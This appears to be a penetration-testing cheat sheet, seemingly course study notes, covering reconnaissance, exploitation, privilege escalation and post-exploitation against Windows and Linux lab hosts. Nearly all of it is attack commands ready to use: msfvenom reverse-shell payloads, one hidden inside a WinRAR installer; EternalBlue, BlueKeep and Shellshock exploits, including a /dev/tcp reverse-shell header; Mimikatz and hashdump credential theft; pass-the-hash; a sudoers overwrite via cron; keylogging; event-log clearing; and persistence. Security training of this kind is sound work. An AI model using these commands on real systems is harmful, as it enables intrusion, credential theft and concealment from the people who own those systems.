Assessment Methodologies#
- IP Addresses
- Directories
- Names
- Emails
- Phone Numbers
- Physical Addresses
- Web Technologies Used
- BuiltWith → Firefox Addon (Recommended)
- Wappalyzer → Extension
whatweb <domain> → Linux Toolwebhttrack → Website Copier
Whois Enumeration#
DNS Recon#
WAF#
Subdomain Enumeration#
Google Dorks#
- cache:ine.com
- Exploit-DB Dorks
Email Harvesting#
Leaked Password Databases#
DNS Zone Transfer#
- /etc/hosts → Local DNS
- dnsenum
- dig
- fierce
- nmap
- netdiscover
Host Discovery Techniques#
- Ping Sweeps → ICMP Echo Requests → Tool: fping
fping -a -g 10.10.23.0/24
- ARP Scanning
- TCP SYN Ping → Half-Open Scan
- UDP Ping
- TCP ACK Ping
- SYN-ACK Ping → Sends SYN-ACK packets
NMAP#
- Scripts → /usr/share/nmap/scripts/
- Firewall/IDS Evasion
-f → Fragments IP packets-D → Decoy
- -Pn vs -sn
- -sn → tells Nmap not to scan any ports → forcing it to rely primarily on ICMP echo packets → to identify targets
- -Pn
- Types of Scans:
- TCP Connect Scans (
-sT)
- SYN “Half-open” Scans (
-sS)
- UDP Scans (
-sU)
- TCP Null Scans (
-sN) → sent with no flags set at all
- As per the RFC, the target host should respond with a RST if the port is closed.
- TCP FIN Scans (
-sF) → a request is sent with the FIN flag (usually used to gracefully close an active connection)
- Nmap expects a RST if the port is closed.
- TCP Xmas Scans (
-sX) → send a malformed TCP packet and expects a RST response for closed ports.
- If a UDP port doesn’t respond to an Nmap scan, it will be marked as
open|filtered
- NULL, FIN and Xmas → Firewall Evasion
- Microsoft Windows → may respond to a NULL, FIN or Xmas scan with a RST for every port
- Zenmap:
- Green → Machine is alive
- Red → Machine is alive but not responding or not directly accessible
- Yellow → We have launched the scan (that is, the attacker machine) and it has plotted the other hosts connection with hostname and IP addresses to localhost.
nmap -Pn -p 134,177,234 -sUV 192.156.4.3 --script=discovery
FFUF#
- You could also use any custom keyword instead of
FUZZ, you just need to define it like this wordlist.txt:KEYWORD
ffuf -u http://10.10.199.197/NORAJ -w /usr/share/wordlists/SecLists/Discovery/Web-Content/big.txt:NORAJ
- generic list of files such as raft-medium-files-lowercase.txt
ffuf -u http://10.10.199.197/FUZZ -w /usr/share/seclists/Discovery/Web-Content/raft-medium-files-lowercase.txt
- To hide the progress:
2>/dev/null
- Directories:
ffuf -u http://10.10.199.197/FUZZ -w /usr/share/seclists/Discovery/Web-Content/raft-medium-directories-lowercase.txt
- By adding
-fc 403 (filter code) we’ll hide from the output all 403 HTTP status codes.
-mc 200 → Only shows 200-fr → Filter regexp
Audit#
Penetration Testing#
Windows Vulnerabilities#
- Windos IIS - Port 80, 443
- WebDAV - Port 80, 443
- SMB/CIFS - Port 445
- RDP - Port 3389
- WinRM - Port 5986/443
Exploit - WebDAV IIS#
nmap -sV -p 80 --script=http-enum <target>hydra -L <username-list> -P <password-list> <target> http-get /webdav/davtest -auth user:password -url <url>cadaver <url> → Enter username & password
- Webshells →
/usr/share/webshells
dir C:/ & type C:/<filepath>msfvenom -p windows/meterpreter/reverse_tcp LHOST=<my-ip> LPORT=1234 -f asp > shell.aspservice postgresql start && msfconsole
use multi/handler → Use to setup a listener for payload you created with msfvenomset payload windows/meterpreter/reverse_tcpshow options- set LHOST & LPORT & Run
Exploit - SMB : PSExec#
nmap -sV -sC <target>scanner/smb/smb_loginpsexec.py Administrator@192.168.1.1- Usernames:
/usr/share/metasploit/data/wordlists/common_users.txt
exploit/windows/smb/psexec
Exploit - SMB : Eternal Blue(MS17-010)#
- https://github.com/3ndG4me/AutoBlue-MS17-010
cd Shellcode./shell_prep.sh → Enter Y, Your IP, LPORT, Regular Shell, Stagelessnc -lvnp 1234python eternalblue_exploitX.py <target IP> shellcode/sc_x64.bin- Method 2 : Metasploit
use windows/smb/ms17_010_eternalblue
Exploit - RDP#
use auxiliary/scanner/rdp/rdp_scanner → Set RHOST & RPORT → To detect RDPhydra -L <username-wordlist> -P <password-wordlist> rdp://<target> -s <PORT>xfreerdp /u:<username> /p:<password> /v:<target>:<port>
Exploit - WinRM#
- Port → 5985
crackmapexec winrm <target-ip> -u <username> -p <wordlist-path>crackmapexec winrm <target> -u <username> -p <password> -x <command>evil-winrm.rb -u <username> -p <password> -i <target>use exploit/windows/winrm/winrm_script_exec
- set FORCE_VBS true
- set username & password
- exploit
> use auxiliary/scanner/winrm/winrm_auth_methods
> use auxiliary/scanner/winrm/winrm_login
> set USER_FILE /usr/share/metasploit-framework/data/wordlists/common_users.txt
> set PASS_FILE /usr/share/metasploit-framework/data/wordlists/unix_passwords.txt
> set VERBOSE false
> use use auxiliary/scanner/winrm/winrm_cmd
> set USERNAME administrator
> set PASSWORD tinkerbell
> set cmd whoami
> run
> use exploit/windows/winrm/winrm_script_exec
> set USERNAME <>
> set PASSWORD <>
> set LHOST <IP>
> set FORCE_VBS true
> run
> sysinfo
Privilege Escalation#
Windows#
Exploit - UAC#
- UAC → User Access Control → Windows Security Feature → Used to prevent unauthorized changes from being made to the OS
- It ensures that changes to the IS require approval from admin or a user account that is part of admin group
- https://github.com/hfiref0x/UACME
net usersnet localgroup administratorsuse exploit/windows/http/rejetoo_hfs_execpgrep explorer → Digitmigrate <digit> → Change x86 to x64msfvenom -p windows/meterpreter/reverse_tcp LHOST=<my-ip> LPORT=1234 -f exe > backdoor.exeupload backdoor.exeupload /root/Desktop/Tools/UACME/Akagi64.exe.\Akagi64.exe 23 C:\Temp\backdoor.exe
Enumeration#
Importing Nmap results into MSF#
service postgresql start
msfconsole
msf> db_status
msf> workspace
msf> workspace -a <name> // Create a new workspace
msf> db_import <path_to_file>
msf> hosts // Check whether the data imported successfully
msf> services // Check whether the data imported successfully
msf> db_nmap -Pn -sV -o 10.4.22.173 // Results will be saved in MSF DB
Port Scanning with Auxiliary Modules#
service postgresql start
msfconsole
msf> workspace -a portscan
msf> search portscan
msf> use <module_name> / <index> // scanner/portscan/tcp
msf> show options
msf> set RHOSTS 192.168.100.43 // TARGET IP
msf> curl <> // If HTTP is open
msf> search xoda
msf> use <index/module_name>
msf> show options
msf> set RHOSTS <TARGET IP>
msf> set TARGETURI / -> // Set the path where service is hosted
msf> exploit // It will give meterpreter session
mp> sysinfo // Target Infomation
mp> shell // Open shell session
bash> ifconfig // Identify next target address (x.x.x.x+1)
bash> exit // CTRL + C
mp> run autoroute -s <IP> // IP of one of the machine in subnet -> Add route
mp> background // Will take this session in Background
msf> sessions // View current sessions
msf> search portscan
msf> set RHOSTS <TARGET_2> // Target 1+1 (x.x.x.x+1)
msf> run
msf> back
msf> search udp_sweep
ERROR:
[!] You are binding to a loopback address by setting LHOST to 127.0.0.1. Did you want ReverseListenerBindAddress?
SOLUTION:
SET LHOST <BASE_MACHINE_IP> // Attacker IP
FTP Enumeration#
msf> search type:auxiliary name:ftp
msf> use auxiliary/scanner/ftp/ftp_version
msf> use auxiliary/scanner/ftp/ftp_login
msf> set RHOSTS <IP>
msf> set USER_FILE /usr/share/metasploit-framework/data/wordlists/common_users.txt
msf> set PASS_FILE /usr/share/metasploit-framework/data/wordlists/unix_passwords.txt
msf> run
msf> use auxiliary/scanner/ftp/anonymous
SMB Enumeration#
msf> setg RHOSTS <IP> // Setting a Global variable
msf> search type:auxiliary name:smb
msf> use auxiliary/scanner/smb/smb_version
msf> use auxiliary/scanner/smb/smb_enumusers
msf> info // See info about module
msf> use auxiliary/scanner/smb/smb_enumshares
msf> set ShowFiles true
msf> use auxiliary/scanner/smb/smb_login
msf> set SMB_USER admin
msf> set PASS_FILE /usr/share/metasploit-framework/data/wordlists/unix_passwords.txt
bash> smbclient -L \\\\<IP>\\ -U admin // -L: List all shares
bash> smbclient \\\\<IP>\\<share> -U admin // Replace share name
Web Server Enumeration#
msf> setg RHOSTS <IP>
msf> setg RHOST <IP>
msf> search type:auxiliary name:http
msf> use auxiliary/scanner/http/http_version
msf> use auxiliary/scanner/http/http_header
msf> use auxiliary/scanner/http/robots_txt
msf> use auxiliary/scanner/http/dir_scanner
msf> use auxiliary/scanner/http/files_dir
msf> use auxiliary/scanner/http/http_login
msf> set AUTH_URI <dir> // Replace dir that you want to bruteforce credentials
msf> unset USERPASS_FILE
msf> run
msf> set USER_FILE /usr/share/metasploit-framework/data/wordlists/namelist.txt
msf> set PASS_FILE /usr/share/metasploit-framework/data/wordlists/unix_passwords.txt
msf> set VERBOSE false
msf> run
msf> use auxiliary/scanner/http/apache_userdir_enum
msf> set PASS_FILE /usr/share/metasploit-framework/data/wordlists/common_users.txt
msf> echo "<username>" > user.txt
msf> use auxiliary/scanner/http/http_login
msf> set USER_FILE /root/user.txt
MySQL Enumeration#
// MySQL - TCP Port 3306
msf> use auxiliary/scanner/mysql/mysql_version
msf> use use auxiliary/scanner/mysql/mysql_login
msf> set USERNAME root
msf> set PASSFILE /usr/share/metasploit-framework/data/wordlists/unix_passwords.txt
msf> set VERBOSE false
msf> run // It will bruteforce passwords
// auxiliary/admin/ -> This admin modules requires credentials
msf> use auxiliary/admin/mysql/mysql_enum
msf> set PASSWORD <password> // This module requires creds
msf> set USERNAME root
msf> run
msf> use auxiliary/admin/mysql/mysql_sql
msf> set USERNAME root
msf> set PASSWORD <password>
msf> set SQL show databases;
msf> use auxiliary/scanner/mysql/mysql_schemadump
msf> set USERNAME root
msf> set PASSWORD <password>
bash> mysql -h <IP> -u root -p
SSH Enumeration#
msf> search type:auxiliary name:ssh
msf> use auxiliary/scanner/ssh/ssh_version
msf> use auxiliary/scanner/ssh/ssh_login // Password Auth
msf> use auxiliary/scanner/ssh/ssh_version_pubkey // Key-Pair Auth
msf> set USER_FILE /usr/share/metasploit-framework/data/wordlists/common_users.txt
msf> set PASS_FILE /usr/share/metasploit-framework/data/wordlists/common_passwords.txt
msf> sessions <number>
msf> /bin/bash -i
bash> ls
msf> use auxiliary/scanner/ssh/ssh_enumusers
msf> set USER_FILE /usr/share/metasploit-framework/data/wordlists/common_users.txt
SMTP Enumeration#
msf> search type:auxiliary name:smtp
msf> use auxiliary/scanner/smtp/smtp_version
msf> use auxiliary/scanner/smtp/smtp_enum
Vulnerability Assessment#
Frequently Exploited Windows Services#
- Microsoft IIS → Port 80/443 → Web Server
- WebDAV → Port 80/443 → HTTP Extension that allows clients to update, delete, move & copy files on web server
- SMB/CIFS → Port 445 → Network File Sharing Protocol
- RDP → Port 3389 → Remotely authenticate & interact with Windows system
- WinRM → Port 5986/443 → Windows remote management protocol
MSF Vulnerability Scanning#
bash> searchsploit "Microsoft Windows SMB"
bash> searchsploit "Microsoft Windows SMB" | grep -e "Metasploit"
> wget https://github.com/hahwul/metasploit-autopwn/blob/09320cc637bf363a79a565e4ff3a58a50020ac6f/db_autopwn.rb
> mv db_autopwn.db /usr/share/metasploit-framework/
> load db_autopwn (msf)
> db_autopwn -p -t
> db_autopwn -p -t -PI 445
> analyze
MS17-010 SMB Vulnerability (EternalBlue Exploit)#
- EternalBlue → Collection of Windows Vulnerabilities & exploits that allow attackers to remotely execute arbitrary code & gain access to a Windows System
- Affected Versions
- Vista, 7, Server 2008, 8.1, Server 2012, Windows 10, Windows Server 2016
> nmap -sV -p 445 -O <IP>
> nmap -sV -p 445 --script=smb-vuln-ms17-010 <IP>
> git clone https://github.com/3ndG4me/AutoBlue-MS17-010.git
> cd <DIR>
> pip install -r requirement.txt
> cd shellcode && chmod +x shell_prep.sh
> ./shell_prep.sh // 1. Type Y 2. Enter LHOST IP 3. Enter LHOST port 4. Type 1(Regular CMD Shell) 5. Type 1 (Stageless payload) -> sc_x86.bin / sc_x64.bin
> cd ..
> chmod +x eternalblue_exploit7.py
> nc -nvlp 1234
> python eternalblue_exploit7.py <IP> shellcode/sc_x64.bin
// Method 2
msf> search eternalblue
msf> use exploit/windows/smb/ms17_010_eternalblue
msf> set RHOSTS <IP>
BlueKeep (Windows CVE-2019-0708 RDP Vulnerability)#
- Allow attackers to remotely execute arbitrary code & gain access to a Windows system & consequently the network that the target system is part of
> sudo nmap -p <IP>
msf> search BlueKeep
msf> use auxiliary/scanner/rdp/cve_2019_0708_bluekeep
msf> set RHOSTS <IP>
msf> run
msf> use exploit/windows/rdp/cve_2019_0708_bluekeep_rce
msf> set RHOSTS
msf> exlpoit
PassTheHash Attack#
msf> service postgresql start && msfconsole
msf> search badblue
msf> use exploit/windows/http/badblue_passthru
msf> set RHOSTS <IP>
msf> exploit
mp> pgrep lsass
mp> migrate 780
mp> getuid
mp> load kiwi
mp> lsa_dump_sam // Administrative NTLM Creds
msf> use exploit/windows/smb/psexec
msf> set LPORT <PORT>
msf> set RHOSTS <IP>
msf> set SMBUser Administrator
msf> set SMBPass <LMHash>:<NTLM Hash>
msf> set target Native\ upload
msf> exploit
// Method 2
> crackmapexec smb <IP> -u Administrator -H <NTLM Hash>
> crackmapexec smb <IP> -u Administrator -H <NTLM Hash> -x "ipconfig"
Shellshock (Bash CVE-2014-6271 Vulnerability)#
- Allows an attacker to execute remote arbitrary commands via Bash, consequently allowing the attacker to obtain remote access to the target system via a reverse shell.
> nmap -sV <IP>
> nmap -sV <IP> --script=http-shellshock --script-args "http-shellshock.uri=/gettime.cgi"
>
> Capture this request in Burp
> User-Agent: () { :; }; echo; echo; /bin/bash -c 'cat /etc/passwd'
> nc -nvlp 1234
> User-Agent: () { :; }; echo; echo; /bin/bash -c 'bash -i>&/dev/tcp/192.24.241.2/1234 0>&1'
msf> search shellshock
msf> use exploit/multi/http/apache_mod_cgi_bash_env_exec
msf> set RHOSTS <IP>
msf> set TARGETURI /gettime.cgi
msf> exploit
Vulnerability Scanning#
Nessus#
sudo dpkg -i Nessus.deb // Download from Nessus Website
sudo systemctl start nessusd.service
WMAP#
msf> setg RHOSTS <IP>
msf> load wmap
msf> wmap_sites -a <IP>
msf> wmap_targets -t http://<IP>
msf> wmap_sites -l
msf> wmap_targets -l
msf> wmap_run -t
msf>
Windows Privilege Escalation#
Windows Kernel Exploits#
msf> getsystem // command to run privilege escalation
msf> use post/multi/recon/local_exploit_suggester
msf> set SESSION <Number>
msf> run
Bypassing User Account Control (UAC)#
- In order to bypass UAC, you need to have access to a user account that is a part of the local administrative group on the Windows target system.
- UACMe: https://github.com/hfiref0x/UACME
> net users
> net localgroup administrators
> setg RHOSTS <IP>
> search rejetto
> run
> sysinfo // 32-bit mp session
> pgrep explorer
> migrate <ID>
> sysinfo // 64-bit mp session
> shell
> net user
> net localgroup administrators
>
// MSF : UACME
> use multi/handler
> set payload windows/meterpreter/reverse_tcp
> set LHOST <IP>
> set LPORT <Port>
> run
// Create Payload
> msfvenom -p windows/meterpreter/reverse_tcp LHOST=<IP> LPORT=<Port> -f exe 'backdoor.exe'
// Continue Previous Session
> pwd
> getuid
> getprivs
> cd C:\\
> mkdir temp
> cd temp
> upload backdoor.exe
> upload /root/Desktop/tools/UACME/Akagi64.exe
> shell
> dir
> Akagi63.exe 23 C:\\temp\backdoor.exe
It will connect to lister
> getuid
> getprivs
> getsystem
> hashdump
Access Control Impersonation#
- Windows Access Tokens: Responsible for identifying & describing the security context of a process or thread running on a system.
- Access tokens are generated by the winlogon.exe process every time a user authenticates successfully & includes the identity & privileges of the user account associated with the thread or process.
- Privileges:
- SeAssignPrimaryToken: This allows a user to impersonate tokens
- SeCreateToken: This allows a user to create an arbitrary token with an administrative privileges.
- SeImpersonatePrivilege: This allows a user to create a process under the security context of another user typically with administrative privileges.
> nmap <IP>
> search rejetto
> set RHOSTS <IP>
> exploit
> sysinfo
> pgrep explorer
> migrate <ID>
> getuid
> getprivs
> use incognito
> list_tokens -u
> impersonate_token <Name>
> getuid
> pgrep explorer
> migrate <ID>
Alternate Data Streams (ADS)#
- ADS is an NTFS file attribute & was designed to provide compatibility with the macOS HFS
- Any file created on an NTFS drive will have two different forks/streams:
- Data Stream → Default stream that contains data of the file
- Resource Stream → Typically contains metadata of the file
- Attackers can use ADS to hide malicious code or executables in legitimate files in order to evade detection
Unattended Windows Setup#
- Config Files:
- C:\Windows\Panther\Unattend.xml
- C:\Windows\Panther\Autounattend.xml
> msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=<IP> LPORT=1234 -f exe > payload.exe
> python -m SimpleHTTPServer 80
// Windows
> cd Desktop
> certutil -urlcache -f http://<Kali>/payload.exe payload.exe
> msfconsole
> use multi/handler
> set payload windows/x64/meterpreter/reverse_tcp
> set LHOST <IP>
> set LPORT 1234
> run
// Execute the payload in Windows
> search -f unattend.xml
> cd C:\\Windows\\Panther
> download unattend.xml
> vim password.txt
> base64 -d password.txt
> psexec.py Administrator@<IP> // Enter password
// Windows: runas.exe /user:Administrator cmd // Enter password
Dumping Hashes with Mimikatz#
- Mimikatz: Windows Post Exploitation tool → Allows for the extraction of clear-text passwords, hashes & Kerberos tickers from memory.
> nmap -sV <IP>
> msfconsole
> search badblue
> use exploit/windows/http/badblue_passthru
> set RHOSTS <IP>
> exploit
> sysinfo
> getuid
> pgrep lsass
> migrate <ID>
> getuid
> load kiwi
> ? // Help Menu
> creds_all // Dump all creds
> lsa_dump_sam
> lsa_dump_secrets
> cd C:\\
> mkdir Temp
> cd Temp
> upload /usr/share/windows-resources/mimikatz/x64/mimikatz.exe
> shell
> dir
> mimikatz.exe
> privilege::debug
> lsadump::sam
> lsadump::secrets
> sekurlsa::logonpasswords
Linux Exploits#
FTP#
> nmap -sV <IP>
> ftp <IP> // Check anonymous login
> hydra -L /usr/share/metasploit-framework/data/wordlists/common_users.txt -P /usr/share/metasploit-framework/data/wordlists/unix_passwords.txt <IP> -t 4 ftp
> searchsploit proftpd
SSH#
> hydra -L /usr/share/metasploit-framework/data/wordlists/common_users.txt -P /usr/share/metasploit-framework/data/wordlists/unix_passwords.txt <IP> -t 4 ssh
SAMBA#
- SAMBA is a Linux implementation of SMB
- SAMBA allows Windows systems to access Linux shares & devices
> nmap -sV <IP>
> hydra -l admin -P /usr/share/metasploit-framework/data/wordlists/unix_passwords.txt <IP> smb
> smbmap -H <IP> -u admin -p <password>
> smbclient -L <IP> -U admin
> smbclient //<IP>/shawn -U admin
> ?
> dir
> smbclient //<IP>/nancy -U admin
> get flag
> ls
> cat flag
> smbclient //<IP>/admin -U admin
> tar xzf flag.tar.gz
> cat flag
> enum4linux -a <IP>
> enum4linux -a -u admin -p <password> <IP>
Linux Privilege Escalation#
Linux Kernel Exploits#
> sysinfo
> getuid
> shell
> /bin/bash -i
> cat /etc/passwd
> // Quick Download: Linux Exploit Suggester
> chmod +x les.sh
> ./les.sh
>
- Cron → Time based service that runs applications, scripts & other commands repeatedly on a specific schedule
- In order to elevate our privileges, we will need to find & identify the cron jobs scheduled by the root user or the files being processed by the the cron job
> whoami
> groups <user>
> cat /etc/passwd
> crontab -l // List crontab for current user
> ls -la
> cd /
> grep -rnw /usr -e "/home/student/message"
> cat /tmp/message
> ls -la /usr/local/share/copy.sh
> cat /usr/local/share/copy.sh
> printf '#!/bin/bash\necho "student ALL=NOPASSWD:ALL" >> /etc/sudoers' > /usr/local/share/copy.sh
> sudo su
SUID Binaries#
- SUID → Set Owner User ID permission
- This permission provides users with the ability to execute a script or binary with the permissions of the file owner as opposed to the user that is running the script or binary
- SUID permissions are typically used to provide unprivileged users with the ability to run specific scripts or binaries with “root” permissions.
- The provision of elevate privileges is limited to the execution of the script & does not translate to elevation of privileges.
> whoami
> groups <user>
> ls -la
> file welcome
> strings welcome
> rm greetings
> cp /bin/bash greetings
> ./welcome
> cat /etc/shadow
Dumping Linux Password Hashes#
- Prefix:
- $1 → MD5
- $2 → Blowfish
- $5 → SHA-256
- $6 → SHA-512
> nmap -sV <IP>
> searchsploit proftpd
> setg RHOSTS <IP>
> search proftpd
> use exploit/unix/ftp/proftpd_133c_backdoor
> show options
> set payload payload/cmd/unix/reverse
> exploit
> /bin/bash -i
> id
> // Go in background
> sessions
> session -u 1
> sysinfo
> getuid
> cat /etc/shadow
// Get hash
> use post/linux/gather/hashdump
> show options
> set SESSION 2
> run
// Crack hash
> use auxiliary/analyze/crack_linux
> set SHA512 true
> run
Network-Based Attacks#
Firewall Detection & IDS Evasion#
> nmap -Pn -sS -F <IP> // -F -> Fast Scan
> nmap -Pn -sS -sV -F -f <IP> // -f -> Fragment Packets
SMB & NetBIOS Enumeration#
- NetBIOS → API & a set of network protocol providing communication services over a local network. It is used primarily to allow applications on different computers to find & interact with each other on a network
- SMB → A network file sharing protocol that allows computers on a network to share files, printers, & other resources.
> cat /etc/hosts
> ping demo.ine.local // reachable IP1
> ping demo1.ine.local // not reachable IP2
> nmap demo.ine.local
> nbtscan
> whatis nbtscan
> nbtscan <IP/Subnet>
> nbtscan
> nmblookup -A <IP1>
> nmap -sU -p 137 <IP1>
> nmap -sU -sV -p 137 -T4 --script=nbstat.nse -Pn -n <IP1>
> nmap -sV -p 139,445 demo.ine.local
> ls -la /usr/share/nmap/scripts/ | grep -e "smb-*"
> nmap -p445 --script smb-protocols demo.ine.local
> nmap -p445 --script smb-security-mode demo.ine.local
> smbclient -L demo.ine.local // testing for anonymous access -> press enter
> nmap -p445 --script smb-enum-users demo.ine.local
> nano users.txt // enter all usernames
> hydra -L users.txt -P /usr/share/metasploit-framework/data/wordlists/unix_passwords.txt demo.ine.local smb
> psexec.py administrator@demo.ine.local
> whoami
// MSF
> search psexec
> use exploit/windows/smb/psexec
> set SMBUser <username>
> set SMBPass <password>
> set payload windows/x64/meterpreter/reverse_tcp
> exploit
> sysinfo
> shell
> ping <IP2> // Exit
> run autoroute -s <IP2/Subnet> // /20 -> Meterpreter
> background
> seach socks
> use auxiliary/server/socks_proxy
> set VERSION 4a // cat /etc/proxychains4
> set SRVPORT <ProxychainPort>
> run
> netstat -antp
// Machine 1
> proxychains nmap demo1.ine.local -sT -Pn -sV -p 445
// MSF
> shell
> net view <IP2>
> background
> migrate -N explorer.exe
> shell
> net view <IP2>
> net use D: \\<IP2>\Documents
> net use K: \\<IP2>\K$
> dir D:
>
SNMP Enumeration#
> cat /etc/hosts
> nmap -sU -sV -p 161 demo.ine.local
> ls -la /usr/share/nmap/scripts | grep -e "snmp-*"
> ls -la /usr/share/nmap/nselib/data/ | grep snmp
> nmap -sU -p 161 --script=snmp-brute demo.ine.local
> snmpwalk -v 1 -c public demo.ine.local
> nmap -sU -p 161 --script=snmp-* demo.ine.local > snmp_results // Enumerate users, etc.
> hydra -l administrator -P /usr/share/metasploit-framework/data/wordlists/unix_passwords.txt <IP> smb
>
SMB Relay Attack#
- It is type of network attack where an attacker intercepts SMB traffic, manipulates it & relays it to a legitimate server to gain unauthorized access to resources or perform malicious actions
> search smb_relay
> use exploit/windows/smb/smb_relay
> set SRVHOST <IP> // Kali Linux IP - ifconfig
> set LHOST <IP> // Kali Linux IP - ifconfig
> set SMBHOST <IP> // Check lab docs
>
// New Tab
> echo "<Kali-IP> *.sportsfoo" > dns
> dsnspoof -i eth1 -f dns
>
MSFVenom#
> msfvenom -a x86 -p windows/meterpreter/reverse_tcp LHOST=<A-IP> LPORT=<A-Port> -f exe > payloadx86.exe
> msfvenom -a x64 -p windows/meterpreter/reverse_tcp LHOST=<A-IP> LPORT=<A-Port> -f exe > payloadx86.exe
> msfvenom --list formats
> msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=<A-IP> LPORT=<A-Port> -f elf > payloadx86.elf
// SHELLCODE
// -i -> Iterations
// -e -> Encoding
// -x -> Inject in file
// -k -> Keep original behavior of file (ex. winrar.exe)
> msfvenom -p windows/meterpreter/reverse_tcp LHOST=<ip> LPORT=1234 -e x86/shikata_ga_nai -f exe > encodedx86.exe
> msfvenom -p windows/meterpreter/reverse_tcp LHOST=<ip> LPORT=1234 -i 10 -e x86/shikata_ga_nai -f exe > encodedx86.exe
> msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=<ip> LPORT=1234 -i 10 -e x86/shikata_ga_nai -f elf > encodedx86
> msfvenom -p windows/meterpreter/reverse_tcp LHOST=<ip> LPORT=1234 -i 10 -e x86/shikata_ga_nai -f exe -x ~/Downloads/winrar601.exe > winrar.exe
> msfvenom -p windows/meterpreter/reverse_tcp LHOST=<ip> LPORT=1234 -i 10 -e x86/shikata_ga_nai -f exe -k -x ~/Downloads/winrar601.exe > winrar.exe
// MSF Scripts
> msfconsole -r handler.rc
>
HTTP File Server (HFS)#
> db_nmap -sS -sV -O <IP>
> search type:exploit name:rejetto
> use exploit/windows/http/rejetto_hfs_exec
> set RHOSTS <IP>
> exploit // 32-bit session
> set payload windows/x64/meterpreter/reverse_tcp
> exploit // 64-bit session
Apache Tomcat Java Server#
> setg RHOSTS <IP>
> db_nmap -sS -sV -O <IP>
> services
> search type:exploit tomcat_jsp
> use exploit/multi/http/tomcat_jsp_upload_bypass
> set payload java/jsp_shell_bind_tcp
> set LHOST & LPORT
> set SHELL cmd
> exploit
> background the session
> msfvenom -p windows/meterpreter/reverse_tcp LHOST=<Kali-IP> LPORT=1234 -f exe> meterpreter.exe
> sudo python -m SimpleHTTPServer 80
> sessions 1
> certutil -urlcache -f http://<Kali-IP>/meterpreter.exe meterpreter.exe
> dir // Continue
> nano handler.rc
> use multi/handler
> set PAYLOAD windows/meterpreter/reverse_tcp
> set LHOST <Kali-IP>
> set LPORT 1234
> run
> SAVE THE FILE
> msfconsole -r handler.rc
> .\meterpreter.exe // Resume after running handler.rc
> sysinfo
> getuid
FTP Server#
> setg RHOSTS <IP>
> db_nmap -sS -sV -O <IP>
> services
> analyze
> search vsftpd
> use exploit/unix/ftp/vsftpd+234_backdoor
> exploit
> background
> sessions
> search shell_to_meterpreter
> use post/multi/manage/shell_to_meterpreter
> set LHOST <kali-ip>
> set LHOST eth1
> set SESSION <ID>
> run
> sessions 2
> sysinfo
SAMBA : File Sharing Service#
> setg RHOSTS <IP>
> db_nmap -sS -sV -O <IP>
> search type:exploit name:samba
> use exploit/linux/samba/is_known_pipename
> check // check it it's vulnerable
> run
> ls / pwd
> background
> search shell_to_meterpreter
> use post/multi/manage/shell_to_meterpreter
> set LHOST eth1
> set SESSION <ID>
> run
> sessions 2
> sysinfo
SSH#
> setg RHSOTS <IP>
> db_nmap -sS -sV -O <IP>
> search libssh_auth_bypass
> use auxiliary/scanner/ssh/libssh_auth_bypass
> set SPAWN_PTY true
> run
> session 1
> > background
> search shell_to_meterpreter
> use post/multi/manage/shell_to_meterpreter
> set LHOST eth1
> set SESSION <ID>
> run
> sessions 2
SMTP#
> setg RHSOTS <IP>
> db_nmap -sV -O <IP>
> search type:exploit name:haraka
> use exploit/linux/smtp/haraka
> set SRVPORT 9898
> set email_to root@attackdefense.test
> set payload linux/x64/meterpreter_reverse_http
> set LHOST eth1
Meterpreter#
> edit flag1 // Text Editor
> download flag1
> checksum md5 /bin/bash
> getenv PATH
> search -d /usr/bin -f *backdoor*
> search -f *.jpg
> search -f *.php
> shell
> ps // Runnning Processes
> migrate <pid>
> session -u 1 // Upgrade shell to Meterpreter session
Windows Post Exploitation#
Modules#
> setg RHOSTS <IP>
> db_nmap -sV <IP>
> search rejetto
> use exploit/windows/http/rejetto_hfs_exec
> run
> getsystem // elevate privileges
> getuid
> hashdump
> show_mount
> ps // list process
> migrate <pid>
> search win_privs
> use post/windows/gather/win_privs
> set SESSION <id>
> run
> search enum_logged
> use post/windows/gather/enum_logged_on_users
> set SESSION <id>
> run
> search checkvm
> use post/windows/gather/checkvm
> set SESSION <id>
> run
> search enum_applications
> use post/windows/gather/enum_applications
> set SESSION <id>
> run
> loot // Store results in DB
> use post/windows/gather/windows_av_excluded
> set SESSION 1
> run
> search enum_computer
> use post/windows/gather/enum_computers
> search enum_patches
> use post/windows/gather/enum_patches
> use post/windows/gather/enum_shares
> use post/windows/manage/enable_rdp
> set SESSION <id>
> run
UAC Bypass#
> use exploit/windows/http/rejetto_hfs_exec
> set payload windows/x64/meterpreter/reverse_tcp
> set LHOST eth1
> exploit
> sysinfo
> getuid
> getsystem
> getprivs
> shell
> net users
> net localgroup administrators
> background
> search bypassuac
> use exploit/windows/local/bypassuac_injection
> set payload windows/x64/meterpreter/reverse_tcp
> set SESSION 1
> set LPORT 1234
> run
> set TARGET Windows\ x64
> run
> getsystem
> hashdump
Token Impersonation With Incognito#
> use exploit/windows/http/rejetto_hfs_exec
> set payload windows/x64/meterpreter/reverse_tcp
> set LHOST eth1
> exploit
> sysinfo
> getprivs
> load incognito
> list_tokens -u
> impersonate_token "ATTACKDEFENSE\Administrator"
> getuid
> migrate <>
> getuid
Windows Persistence#
> use exploit/windows/http/rejetto_hfs_exec
> set payload windows/x64/meterpreter/reverse_tcp
> set LHOST eth1
> exploit
> background
> search platform:windows name:persistence
> use exploit/windows/local/persistence_service
> set payload windows/x64/meterpreter/reverse_tcp
> set SESSION 1
> exploit
> set payload windows/meterpreter/reverse_tcp
> exploit
> sysinfo
> sessions -K
> use multi/handler
> set LHOST eth1
> run
Enabling RDP#
> use exploit/windows/http/badblue_passthru
> set RHOSTS
> set target Badblue\ EE\ 2.7\ Universal
> exploit
> background
> search enable_rdp
> use post/windows/manage/enable_rdp
> set SESSION 1
> exploit
> db_nmap -sV -p 3389 <IP>
> shell
> net user administrator hacker_123321 // Change Password
> xfreerdp /u:administrator /p:hacker_123321 /v:<IP>
Windows Keylogging#
> use exploit/windows/http/badblue_passthru
> exploit
> pgrep explorer
> migrate <ID>
> keyscan_start
> keyscan_dump
Clearing Windows Event Logs#
> use exploit/windows/http/badblue_passthru
> exploit
> clearev // Deletes Event Logs
Windows Pivoting#
> use exploit/windows/http/rejetto_hfs_exec
> exploit
> sysinfo
> ipconfig // Copy the IP which is from same subnet : Victim 2
> run autoroute -s <IP>/<range> (Range-20)
> background
> use auxiliary/scanner/portscan/tcp
> set RHOSTS <Victim2>
> set PORTS 1-100
> exploit
> sessions 1
